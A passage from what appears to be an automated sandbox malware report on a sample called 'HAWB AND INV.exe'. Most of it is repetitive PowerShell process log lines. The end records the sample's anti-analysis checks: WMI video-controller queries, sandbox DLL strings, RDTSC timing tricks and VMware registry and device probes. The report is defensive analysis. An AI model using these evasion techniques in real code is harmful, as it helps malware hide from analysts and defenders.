          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: HAWB AND INV.exe PID: 6752, type: MEMORY
          Source: Yara matchFile source: 0.2.HAWB AND INV.exe.2d0f5ac.1.raw.unpack, type: UNPACKEDPE
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000001185E4 second address: 00000000001185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 000000000011896E second address: 0000000000118974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_004088A0 rdtsc
